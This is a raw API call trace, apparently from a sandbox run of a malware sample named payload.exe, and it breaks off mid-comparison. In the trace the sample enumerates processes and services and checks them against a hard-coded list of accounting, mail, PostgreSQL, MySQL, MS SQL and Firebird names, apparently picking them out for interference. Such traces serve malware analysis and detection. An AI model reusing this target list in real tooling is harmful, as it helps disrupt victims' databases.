lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0266.872] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.872] lstrlenW (lpString="csrss.exe") returned 9 [0266.872] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.872] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.872] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.872] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.872] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.872] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.872] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.873] lstrlenW (lpString="wininit.exe") returned 11 [0266.873] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0266.873] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0266.873] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0266.873] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0266.873] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0266.873] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0266.873] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0266.873] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.873] lstrlenW (lpString="csrss.exe") returned 9 [0266.873] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.873] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.873] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.873] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.873] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.873] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.873] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.873] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.873] lstrlenW (lpString="winlogon.exe") returned 12 [0266.873] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0266.874] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0266.874] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0266.874] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0266.874] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0266.874] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0266.874] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0266.874] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.874] lstrlenW (lpString="services.exe") returned 12 [0266.874] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0266.874] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0266.874] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0266.874] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0266.874] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0266.874] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0266.874] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0266.874] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.874] lstrlenW (lpString="lsass.exe") returned 9 [0266.875] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0266.875] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0266.875] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0266.875] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0266.875] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0266.875] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0266.875] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0266.875] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0266.875] lstrlenW (lpString="lsm.exe") returned 7 [0266.875] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0266.875] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0266.875] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0266.875] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0266.875] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0266.875] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0266.875] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0266.876] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.876] lstrlenW (lpString="svchost.exe") returned 11 [0266.876] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.876] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.876] lstrlenW (lpString="svchost.exe") returned 11 [0266.876] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.876] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.876] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.877] lstrlenW (lpString="svchost.exe") returned 11 [0266.877] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.877] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.877] lstrlenW (lpString="svchost.exe") returned 11 [0266.877] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.877] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.877] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.878] lstrlenW (lpString="svchost.exe") returned 11 [0266.878] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.878] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.878] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.878] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.878] lstrlenW (lpString="audiodg.exe") returned 11 [0266.878] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.878] lstrlenW (lpString="svchost.exe") returned 11 [0266.878] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.879] lstrlenW (lpString="svchost.exe") returned 11 [0266.879] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0266.879] lstrlenW (lpString="userinit.exe") returned 12 [0266.879] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.879] lstrlenW (lpString="dwm.exe") returned 7 [0266.879] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.879] lstrlenW (lpString="explorer.exe") returned 12 [0266.879] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.880] lstrlenW (lpString="spoolsv.exe") returned 11 [0266.880] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0266.880] lstrlenW (lpString="taskhost.exe") returned 12 [0266.880] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.880] lstrlenW (lpString="svchost.exe") returned 11 [0266.880] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0266.880] lstrlenW (lpString="payload.exe") returned 11 [0266.880] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0266.881] lstrlenW (lpString="dllhost.exe") returned 11 [0266.881] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0266.881] lstrlenW (lpString="reader_sl.exe") returned 13 [0266.881] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0266.881] CloseHandle (hObject=0x348) returned 1 [0266.881] Sleep (dwMilliseconds=0x1f4) [0267.442] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c06b0 [0267.445] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0267.446] GetLastError () returned 0xea [0267.446] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0267.446] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0267.447] CloseServiceHandle (hSCObject=0x43c06b0) returned 1 [0267.448] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0267.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.448] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0267.448] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0267.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0267.448] lstrlenW (lpString="AudioSrv") returned 8 [0267.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0267.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0267.448] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0267.448] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0267.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0267.448] lstrlenW (lpString="BFE") returned 3 [0267.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0267.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0267.448] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0267.448] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0267.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0267.448] lstrlenW (lpString="CryptSvc") returned 8 [0267.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0267.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0267.448] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0267.448] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0267.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0267.448] lstrlenW (lpString="CscService") returned 10 [0267.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0267.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0267.448] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0267.448] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0267.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0267.449] lstrlenW (lpString="DcomLaunch") returned 10 [0267.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.449] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0267.449] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0267.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0267.449] lstrlenW (lpString="Dhcp") returned 4 [0267.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0267.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0267.449] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0267.449] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0267.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0267.449] lstrlenW (lpString="Dnscache") returned 8 [0267.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0267.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0267.449] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0267.449] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0267.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0267.449] lstrlenW (lpString="DPS") returned 3 [0267.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0267.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0267.449] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0267.449] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0267.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0267.449] lstrlenW (lpString="eventlog") returned 8 [0267.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0267.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0267.449] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0267.449] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0267.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0267.450] lstrlenW (lpString="EventSystem") returned 11 [0267.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0267.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0267.450] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0267.450] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0267.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0267.450] lstrlenW (lpString="gpsvc") returned 5 [0267.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0267.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0267.450] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0267.450] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0267.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0267.450] lstrlenW (lpString="LanmanWorkstation") returned 17 [0267.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0267.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0267.450] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0267.450] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0267.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0267.450] lstrlenW (lpString="lmhosts") returned 7 [0267.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0267.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0267.450] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0267.450] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0267.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0267.450] lstrlenW (lpString="MMCSS") returned 5 [0267.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0267.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0267.450] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0267.450] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0267.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0267.450] lstrlenW (lpString="MpsSvc") returned 6 [0267.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0267.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0267.451] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0267.451] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0267.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0267.451] lstrlenW (lpString="NlaSvc") returned 6 [0267.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0267.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0267.451] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0267.451] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0267.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0267.451] lstrlenW (lpString="nsi") returned 3 [0267.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0267.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0267.451] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0267.451] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0267.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0267.451] lstrlenW (lpString="PcaSvc") returned 6 [0267.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0267.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0267.451] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0267.451] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0267.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0267.451] lstrlenW (lpString="PlugPlay") returned 8 [0267.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0267.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0267.451] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0267.451] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0267.451] 